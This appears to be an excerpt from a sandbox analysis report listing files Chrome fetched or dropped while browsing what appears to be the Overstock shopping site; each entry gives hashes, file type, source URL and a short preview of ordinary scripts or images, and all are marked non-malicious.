                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:nU/7Ry5ZLXYrXfN2eQIvTnjypVeV3bjFechiQuIz:W7RCubfNkIvTnWuhbQchiIz
                                                                                                                                                                                    MD5:7987C9D1A0CBBBA2B9FC09FAC353D83D
                                                                                                                                                                                    SHA1:F07E2DAB7271202F892EF3C8200D0743B35C78C6
                                                                                                                                                                                    SHA-256:0FA0B7F5A235064C82A3060A94F4A27E3D2CF5F4D4016296076123746145A91C
                                                                                                                                                                                    SHA-512:7824EC151F911B299DC4DEFCB76C7CEF74470C877199B1E2E9491CB37362245BEF6F7956F54D3A4030431539BFEABDFF905550F19B3305CCB69D8448314FF466
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:"use strict";(self.webpackChunkpage_triggers=self.webpackChunkpage_triggers||[]).push([[41],{2543:function(e,t){Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;t.default=function(){return function(e){if(window)try{window.dataLayer=window.dataLayer||[],window.dataLayer.push(e)}catch(e){console.error("Error pushing to dataLayer: ".concat(e))}}}},41:function(e,t,n){var i=n(5318);Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var a=i(n(7757)),r=i(n(3038)),o=i(n(8926)),l=n(8661),s=i(n(5697)),c=i(n(2325)),d=i(n(8291)),p=i(n(113)),u=i(n(2020)),f=n(2759),m=n(6584),g=function(){var e=(0,o.default)(a.default.mark((function e(t){var n,i,r,o,l,s;return a.default.wrap((function(e){for(;;)switch(e.prev=e.next){case 0:return n=(0,f.clientConfig)("API_URL"),e.prev=1,e.next=4,fetch("".concat(n,"offers/me"),{method:"POST",headers:{cookie:t,Accept:"application/json","Content-Type":"application/json; charset=UTF-8"},credentials:"include",body:JSON.stringify({acceptedOf
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ISO Media, AVIF Image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):4101
                                                                                                                                                                                    Entropy (8bit):7.491791366645554
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:rGzdvIl/XOScmy0S8CEAW5lz5GT9B4vgYqj/ssEt3j7kkf:rG6OfylAOx5G34vgYqj/ssEt3j9
                                                                                                                                                                                    MD5:B74DD6176288B231C49088B84ED5C542
                                                                                                                                                                                    SHA1:13916A188B32C150E4E5FC37D3DD5BB46FDDC7E3
                                                                                                                                                                                    SHA-256:7675E3B977EBB0746699C875C5F5E19C0A99BDAD95B863A49DAD3A0F6BBDE6F0
                                                                                                                                                                                    SHA-512:9B8B1DBEBFFB78C0108F2856E01D91419B172E036CE477F8EAE0EC27D1E58F605F2DB9E382A0DA68380838EFBAA44A82083EA085377ACFCFA623DB5F37013711
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/collections/Natural-Live-Edge-Design-Two-Tone-Exotic-Mahogany-Wood-Bedroom-Collection.jpg?v=1713207080&width=250
                                                                                                                                                                                    Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm.........4iloc....D@...................W.......G.............8iinf..........infe........av01.....infe........Exif.....iprp....ipco....colrrICC....lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.............av1C........ispe................pixi............ipma...................iref........cdsc..........mdat.......~Y !..2.....C... .5/...(......m..!."...J..8....h..j&.>s\e.N7.N0.x.nU..........:F..$0.D.Lh..@..U.lb....P..x.s...C1|........H...|...I..D.....5.. ....|.....V....$n.BG.S...7Q.N?>.&.]a.<I..b..WX..$ar.!..%.{..j.1r.F.........z.@R..A
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (12303)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):12394
                                                                                                                                                                                    Entropy (8bit):5.287643627842759
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:rek+w1w+FCH501fo7R1qpu5TMSU9i/VY8cJw3:reLOjFSGxuSKJ3
                                                                                                                                                                                    MD5:70073EF6766D4163337BE9784525AE8A
                                                                                                                                                                                    SHA1:5C3957E4CD6476F69CF5557353B97FDE3D672776
                                                                                                                                                                                    SHA-256:20935C4A7536149778BA3CCF537AAA9DBC520DA74BF74A1736488A8E6BDF9E28
                                                                                                                                                                                    SHA-512:177BCC2A278AD5CAE1207AFF43FB6CAC7E686D00E0110B57DD0DCEDDBB6D084943567B56C88412B6CAB9680687A528C8E73219DFACBB6959A3935B51C7965025
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:(function(shopify) {.(()=>{var se="WebPixel::Render";var Y=e=>shopify.extend(se,e);var K={config:0,set:1,page_view:2,view_item:3,add_to_cart:4,purchase:5,begin_checkout:6,search:7,add_payment_info:8,update:9,default:10},ce={send_to:0,page_path:1,page_title:2,page_location:3,ignore_referrer:4,ecomm_prodid:5,ecomm_totalvalue:6,ecomm_pagetype:7,items:8,id:9,name:10,brand:11,category:12,coupon:13,price:14,quantity:15,variant:16,value:17,currency:18,tax:19,shipping:20,search_term:21,total:22,transaction_id:23,ad_storage:24,ad_user_data:25,ad_personalization:26,analytics_storage:27},le={config:[],set:[],page_view:["send_to"],view_item:["send_to","ecomm_prodid"],add_to_cart:["send_to","ecomm_prodid"],purchase:["send_to","transaction_id"],begin_checkout:["send_to"],search:["send_to"],add_payment_info:["send_to"]};var fe="",ge=function(e){fe=e},Pe=Math.floor(Math.random()*2147483648),pe=function(){if(arguments[0]==="js")return;let r=window.dataLayer.filter(o=>Object.prototype.toString.call(o)==
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):24200
                                                                                                                                                                                    Entropy (8bit):5.116595576774217
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:ta89KHPCMeGyWrqP7CHxvGqxeEZ97K1aM:trKH/7+mHxvGKtY
                                                                                                                                                                                    MD5:27332F15A0E9BCD17976072ED9DA39D4
                                                                                                                                                                                    SHA1:B52FEF6B67F87E2CC930B4E5D0C76F82E0B01FF6
                                                                                                                                                                                    SHA-256:24B5565F666CC2671C728431F76FFE76E0AAC28118CCC02A2DF398BAEEE3E3E7
                                                                                                                                                                                    SHA-512:95E409D5E0E61A82343535D765EBAE129B76F7A23A9700B18A16D876FEA96E3C554C56107E70BBD1B9A184DE46E7A409E871BECC782868A4985C2CDFC1D8B66B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"localizations":{"review_display.4.0.snapshot.rating_count_plural":"{0} Star Ratings","review_display.4.0.share_your_photo.confirmation.message":"Your photo has been submitted for approval. \nCheck back soon to see it live!","review_display.4.0.sorting.lowest_rated_label":"Lowest Rated","review_display.4.0.flagging.form_label":"What's the issue?","qa_display.4.0.search.no_results.header":"No results but.","review_display.4.0.badging.verified_reviewer_asset":"","review_display.4.0.flagging_form.email_error":"Email address is required","qa_display.4.0.button.ask_question":"Ask a Question","qa_display.4.0.search.input.placeholder":"Search for...","review_display.4.0.translation.revert_button":"Show original","review_display.4.0.common.yes":"Yes","qa_display.4.0.button.show_more":"Show more","review_display.4.0.flagging_form.button_label.flag":"Flag","review_display.4.0.common.by":"By","review_display.4.0.filtering.dropdown_v2.mobile_modal.submit_filters":"See Results","review_display.4
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (2159), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2159
                                                                                                                                                                                    Entropy (8bit):5.187883475890047
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:6KLxP8Njis5O3sqw0TjnHuBAz3Cs0JFf2EwM5ccR5P/4hx95Ts7W:RVqjrTaqADCvFf2vsXvPAnL+W
                                                                                                                                                                                    MD5:5737D20E84D62E43284A5575D810A012
                                                                                                                                                                                    SHA1:0261F4E3A0CCD50821BC00B3C81040A2990ABCE0
                                                                                                                                                                                    SHA-256:7C37E17BFEB054B199C90965D335D1DA2455954BB849B754262C1BF2F98594F9
                                                                                                                                                                                    SHA-512:7C17F7335E0AEA6B2A0D0AE3F725187208EDEC9587DFAE1906D01D9B6ECCCD2F03DF67D8EE693DEDECC9C11DB2FBD34277D600A4D8D8981A088FACCB8B5B1B18
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://js.appboycdn.com/shopify-scripts/0.2.0/braze-product-script.min.js?product_click=true&product_view=true&shop_domain=26f4aa-09.myshopify.com&shop=26f4aa-09.myshopify.com
                                                                                                                                                                                    Preview:(function(){const e=document.documentElement.innerHTML.includes("BrazeWebSdkScript.js");if(e){return}function r(){var e=null;if(window.braze!==undefined){e=window.braze}else if(window.appboy!==undefined){e=window.appboy}return e}function o(e){const t=100;window.setTimeout(function(){if(r()!==null&&r().getUser()){e()}else{o(e)}},t)}function s(e,o,n){fetch(e+".js").then(e=>e.json()).then(e=>{var t={id:e.id,title:e.title,price:e.price,vendor:e.vendor,images:e.images,shopify_storefront:n};r().logCustomEvent(o,t);r().requestImmediateDataFlush()})}function n(){const e=new URL([...document.getElementsByTagName("script")].map(e=>e.src).find(e=>e.includes("braze-product-script")));const t=new URLSearchParams(e.search);return Object.fromEntries(t.entries())}function u(e){const t=e.lastIndexOf("/")+1;const o=e.indexOf("?")>0?e.indexOf("?"):e.length;return e.substring(t,o)}function c(e,t,o,n,r,i){productName=u(t);const c=JSON.parse(localStorage.getItem(o)||"{}");lastEventTimeForProduct=c[productNa
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):33
                                                                                                                                                                                    Entropy (8bit):4.741363816328152
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:HLszELACv:rlAs
                                                                                                                                                                                    MD5:FCE53AADCC76D6FE802E7998503F1622
                                                                                                                                                                                    SHA1:56FF4B7AD4B70A23D00AD38041ADA836619CC910
                                                                                                                                                                                    SHA-256:0821951C01640DB472308C1855DB1C5A7AAF08E8EC8C609E4FAB9D5D864F63E8
                                                                                                                                                                                    SHA-512:66220A964E574CBB3BD3A4A583E4CBDE65C65A935916D492B19E4A83DF94046E2816110A0961E35148B4EAFD305459673A3EAD7C8ED885798F7679C3DA695310
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/PickupPointCarrierLogo.C0wRU6wV.css
                                                                                                                                                                                    Preview:.veGnT{display:block;width:100%}.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (32461)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):69246
                                                                                                                                                                                    Entropy (8bit):5.499115539817298
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:d2fwG1e7F2fy+WdsnMat95WnKFN0mI5KhvyEpH8dInSQu4cSStUkk0og0t:d2fIRZ+WOnZj5WnKFNY5KJpHNSQgWkk1
                                                                                                                                                                                    MD5:C8CE6A273CD1FD679985F0CFE1F63170
                                                                                                                                                                                    SHA1:066BE33802F4697A29C3A49DAD1A81785D8514A5
                                                                                                                                                                                    SHA-256:D83B7F084326A698DEC02C1131ECDB4E0D8432342AC8E4AC043A1BC80F5B1DA0
                                                                                                                                                                                    SHA-512:0BCDAC57F62C425D054CCA1D1C2459B0DC2C5548F8B6B26AD871B679A65A1FC7B302A61C181C977DA10223BB408E805FF82B362D503C16714DBFFFAFD3C4B2DA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:/**. * name: @tapcart/webbridge. * version: v1.10.0. * description: Tapcart WebBridge SDK. * homepage: https://github.com/tapcartinc/tapcart-webbridge. */.(function(){"use strict";try{if(typeof document<"u"){var e=document.createElement("style");e.appendChild(document.createTextNode(".tapcart-webbridge #tapcart-web-banner{display:none!important}.tapcart-webbridge footer,.tapcart-webbridge header,.tapcart-webbridge #footer,.tapcart-webbridge #header{display:none}.tapcart-webbridge iframe{display:none}")),document.head.appendChild(e)}}catch(t){console.error("vite-plugin-css-injected-by-js",t)}})();.(function(ae){typeof define=="function"&&define.amd?define(ae):ae()})(function(){"use strict";const ae=t=>t&&Object.keys(t).length===0&&t.constructor===Object;function rn(t){const e={};if(!Array.isArray(t))return e;for(const r of t)r&&r.name&&r.enabled&&(e[r.name]=r);return e}const nn=t=>{if(!t)return{};const e=n=>Array.isArray(n)?n.reduce((a,{namespace:s,key:i,value:o})=>(a[s]?a[s][i]=o:a[s]=
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (8626)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):295546
                                                                                                                                                                                    Entropy (8bit):5.578552490630025
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:ki27g0PVhQwiztG3ETCaho9y0l5CptDY8/I8+yr/OUYhcDmKD0C8Gp/OG:ki27g0PViG3gxhobM/GUTx0C8Gp/J
                                                                                                                                                                                    MD5:F46D0DAE40D499A36E17CD203C0B2F1C
                                                                                                                                                                                    SHA1:B20E06213C5130A7521BBBE939271A59A8311E3D
                                                                                                                                                                                    SHA-256:09EA864DA99D888B14BF07F108291A5436437B781E8B3477F965C34D95F1C1EF
                                                                                                                                                                                    SHA-512:0DC70D92A3C641FEAF62481504D623099A20BFAE6488EE1238A2E50BC89A585D5D81752232039301A71E94C0DE2534E9F11E1BD49DB77390D917CCF60B881CDE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"46",. . "macros":[{"function":"__e"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"customerId"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"value"},{"function":"__u","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"transaction_id"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"address.country"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"address.city"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"address.address1"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                    Entropy (8bit):3.875
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:HmNR:G/
                                                                                                                                                                                    MD5:6F304E001E3E402E2B1F8BEA057B2FF9
                                                                                                                                                                                    SHA1:63BD767C607E7E0C04DFEEC23EBFEFAE0E5AE6B1
                                                                                                                                                                                    SHA-256:8B32403899EFDE6164D81E903A07C88FAA4D6C868A42A406BA7D7BA83AE9B35E
                                                                                                                                                                                    SHA-512:669129A4609769083EBCE66C48D927FD2E2C75AAEF31B2B7D546E43B9059ED9A29DC5EE9ABD046EC94CBEBAE874B93D7D51F6A54898DA8E323875DCA51AD6658
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSEAkJ7W1e2fKf2BIFDYm9Bl4=?alt=proto
                                                                                                                                                                                    Preview:CgkKBw2JvQZeGgA=
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):42
                                                                                                                                                                                    Entropy (8bit):2.9881439641616536
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                    MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                    SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                    SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                    SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2446
                                                                                                                                                                                    Entropy (8bit):7.057626598228238
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:NBIl/XflVxoOd0oPQuF9EFhjA2HnUB+XUfB5a3/btUzME:NBIl/XrxRjPQuXEPnEp50btC
                                                                                                                                                                                    MD5:6110007DA699958680BBD951A9F58065
                                                                                                                                                                                    SHA1:6939FFB2DDC13D66864741FBF25C713D33EF44F1
                                                                                                                                                                                    SHA-256:C5E5B83DEA579E3B9EBAA4316A12E74E90ECBD173CC62C8387D210BF3E3CDCEF
                                                                                                                                                                                    SHA-512:1701177CD06BE84F0FC941B018E8D35AA6E14C0B2AEE80D3E86D85BC96366FF0F1EF23C8112E14E8E0DF980A45E64EBBE51D8BB7EE41CD2F7C4409BA80A8E88F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P..................................................................................X...............c..|}..=.8...;`.....V.$1................O..+..x..:......jn...;Vg..j....le...Y.V"T...0EAB...*.......?...;........
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (3371), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):3371
                                                                                                                                                                                    Entropy (8bit):5.288162473384043
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:oxPUxwzsDgDOaaiKjdBV1kVTH6W/DtGtC8CGjRo90:oxPUNghahjH4pGtZCGFu0
                                                                                                                                                                                    MD5:0CA786600986C60B6BA47251C34AE71B
                                                                                                                                                                                    SHA1:5B6AE58C92D9718E4D3405547C1FDC740D01DDBD
                                                                                                                                                                                    SHA-256:217269DB30DF78BA2610A0D82E2A65F0AF1D857846D7C0A361BC370778B4578F
                                                                                                                                                                                    SHA-512:681BE12126B75E279E01D37851FBFC75E08CCE83BDC0C38E550A4F3D290D3AB64C4AD83117F3A34AE029AD53B950EE8D5F08DD66042E20C592D6C2B6A68DE770
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/static/homepage/_next/static/chunks/webpack-2f93db2455fb4597.js
                                                                                                                                                                                    Preview:!function(){"use strict";var e={},t={};function n(r){var o=t[r];if(void 0!==o)return o.exports;var u=t[r]={exports:{}},i=!0;try{e[r](u,u.exports,n),i=!1}finally{i&&delete t[r]}return u.exports}n.m=e,function(){var e=[];n.O=function(t,r,o,u){if(!r){var i=1/0;for(d=0;d<e.length;d++){r=e[d][0],o=e[d][1],u=e[d][2];for(var c=!0,a=0;a<r.length;a++)(!1&u||i>=u)&&Object.keys(n.O).every((function(e){return n.O[e](r[a])}))?r.splice(a--,1):(c=!1,u<i&&(i=u));if(c){e.splice(d--,1);var f=o();void 0!==f&&(t=f)}}return t}u=u||0;for(var d=e.length;d>0&&e[d-1][2]>u;d--)e[d]=e[d-1];e[d]=[r,o,u]}}(),n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,{a:t}),t},n.d=function(e,t){for(var r in t)n.o(t,r)&&!n.o(e,r)&&Object.defineProperty(e,r,{enumerable:!0,get:t[r]})},n.f={},n.e=function(e){return Promise.all(Object.keys(n.f).reduce((function(t,r){return n.f[r](e,t),t}),[]))},n.u=function(e){return"static/chunks/"+e+"."+{651:"8aaebbbff3fb4a6d",741:"5c49c5ccb4a
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):24
                                                                                                                                                                                    Entropy (8bit):2.459147917027245
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:CUXJ/lH:Dl
                                                                                                                                                                                    MD5:BC32ED98D624ACB4008F986349A20D26
                                                                                                                                                                                    SHA1:2D3DF8C11D2168CE2C27E0937421D11D85016361
                                                                                                                                                                                    SHA-256:0C9CF152A0AD00D4F102C93C613C104914BE5517AC8F8E0831727F8BFBE8B300
                                                                                                                                                                                    SHA-512:71ACC6DA78D5D5BF0EEA30E2EE0AC5C992B00EFEC959077DFE0AB769F1DBBD9AF12D5C5C155046283D5416BEB606A9EF323FB410E903768B1569B69F37075B4E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:GIF89a.......,..........
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                    Entropy (8bit):4.301508290129998
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:m8ZJ570T4X7:m+5X7
                                                                                                                                                                                    MD5:AD8B6F08655797587CDEC719A94EFE59
                                                                                                                                                                                    SHA1:182ADF5A140796F81E930649D05654DBF22FD5B7
                                                                                                                                                                                    SHA-256:77D5FE96DEFD6C8C1E3B0466B4827CF83DC7E5C727A10177E115D25132FA86F6
                                                                                                                                                                                    SHA-512:519A8EA7CE2ED8661CC72D58BC0C02E721EF8E64608F4D2E26A56A970D43EBBF21BDF579C543EE1DFD667DA8F87467C60111A3E6D246D435A5C2D066AB88EFA3
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:window['google_noFurtherRedirects'] = true;
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):134761
                                                                                                                                                                                    Entropy (8bit):5.614825900808159
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:6brcpE+pvZtw3RPeFm9LXTyM+BptnYPnXX:6XcZpjsRPeEpXJ+Bptm
                                                                                                                                                                                    MD5:5BCE610DE3D1B675642BCD2EE1FB3FCD
                                                                                                                                                                                    SHA1:D67FF571F6CA7184CEBC783FDB2E829FAE6A79CB
                                                                                                                                                                                    SHA-256:708F3E7EFB0102FC00A285BB10F33A09E1F77FAF4C851FBEEB1DFDA40CD70A74
                                                                                                                                                                                    SHA-512:58708CE4A9D2D6FAE9D305B6B85FB58107044568408EA4CC816FE6375D25FAD2AD8475FB4FA33809C2A66D4C73CC85717EFA1350EBC21FEFFFBDBB41840A445B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[671],{8980:function(e,t,r){"use strict";r.r(t),r.d(t,{__N_SSP:function(){return Kn},default:function(){return Xn}});var n=r(7812),o=r(9499),i=r(7294),a=function(e,t){return e.filter((function(e){var r,n,o,i,a,l,s;return(null===e||void 0===e||null===(r=e.node)||void 0===r||null===(n=r.site_test)||void 0===n?void 0:n.is_sitetest)&&(null===t||void 0===t||null===(o=t[null===e||void 0===e||null===(i=e.node)||void 0===i||null===(a=i.site_test)||void 0===a?void 0:a.st_char])||void 0===o?void 0:o.segment)===(null===e||void 0===e||null===(l=e.node)||void 0===l||null===(s=l.site_test)||void 0===s?void 0:s.st_var)}))[0]||e[0]},l=r(3802),s=r.n(l),c=r(5893);function d(e){var t=e.children;try{return(0,c.jsx)("main",{className:s().main,id:"home-page",children:t})}catch(r){return console.error("SSR COMPONENT FAILED. COMPONENT: Main, ERROR: ".concat(r)),null}}d.displayName="Main";var u=r(7191),p="HP",h="CartMod";function m(){var e=arguments.lengt
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (34889), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):34889
                                                                                                                                                                                    Entropy (8bit):5.165062606043757
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:UktRjhfL7+m82RrIbPrf+V67vgJ7jZXRilpgher1pSrcilLcYrxwfLbPXaglRRkO:Rtv82mj9lpgo1ZelalPgNr0lQv4
                                                                                                                                                                                    MD5:9ED1700DA5A1D318C463C419F1677893
                                                                                                                                                                                    SHA1:907D3CC8AA3617F8B71228ED16AD638BC13103B2
                                                                                                                                                                                    SHA-256:A376B6ED2F74F43BC28924E50344DFC684875CCB082016E97AA88A2698311FDE
                                                                                                                                                                                    SHA-512:B35C04B1623EBE789624F70A73B66134D9C1EF6AA468A59EF8AE12D2363BCC855A3C4CD766675D2F7B9807D360A93EB6DDDC3575224212EE6C68EC4C498BB87E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:var __extends=this&&this.__extends||function(){var n=function(t,i){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(n,t){n.__proto__=t}||function(n,t){for(var i in t)Object.prototype.hasOwnProperty.call(t,i)&&(n[i]=t[i])},n(t,i)};return function(t,i){function r(){this.constructor=t}n(t,i);t.prototype=i===null?Object.create(i):(r.prototype=i.prototype,new r)}}(),PostType,DataWrapper;(function(n){n[n.OnLoad=0]="OnLoad";n[n.OnBeforeUnload=1]="OnBeforeUnload";n[n.OnAbort=2]="OnAbort";n[n.Flush=3]="Flush"})(PostType||(PostType={}));DataWrapper=function(){function n(){this.hasErrors=!1;this._appErrors=null;this.hasIndicators=!1;this._indicators=null;this.hasTracepoints=!1;this._tracepoints=null}return n.prototype.addError=function(n,t){this.hasErrors||(this._appErrors={},this.hasErrors=!0);this._appErrors[n]=t},n.prototype.getErrors=function(){return this._appErrors},n.prototype.addIndicator=function(n){this.hasIndicators||(this._indicators={},this.hasIndicators=!0);f
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (4650)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):4651
                                                                                                                                                                                    Entropy (8bit):5.4036576068997695
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:uwxsQlxIF8t31171HpojsnjqBjfUiX8P/74KAFG0hsXbfpvFawxZG:DJnImtLdpoj/BjhXtTG0hsXbRvEwq
                                                                                                                                                                                    MD5:BEB78DBCAC2CCBE37E1B5136C24B8EB7
                                                                                                                                                                                    SHA1:AA0DAC06A6277475528373631DAB92FB96E71CBA
                                                                                                                                                                                    SHA-256:2300D9A6E2B5528A95A046EC082E293AC05F5853FC782A9E54AACC61347E2383
                                                                                                                                                                                    SHA-512:BFF552C0A0FC211A80B180BD0D64DE30491E79204E248CB93623AF7F68133CAAA8B0EA012AB9511B1CC7C52FE8D4E8550EE5486C392577C678779D4C465AE68F
                                                                                                                                                                                    Malicious:false
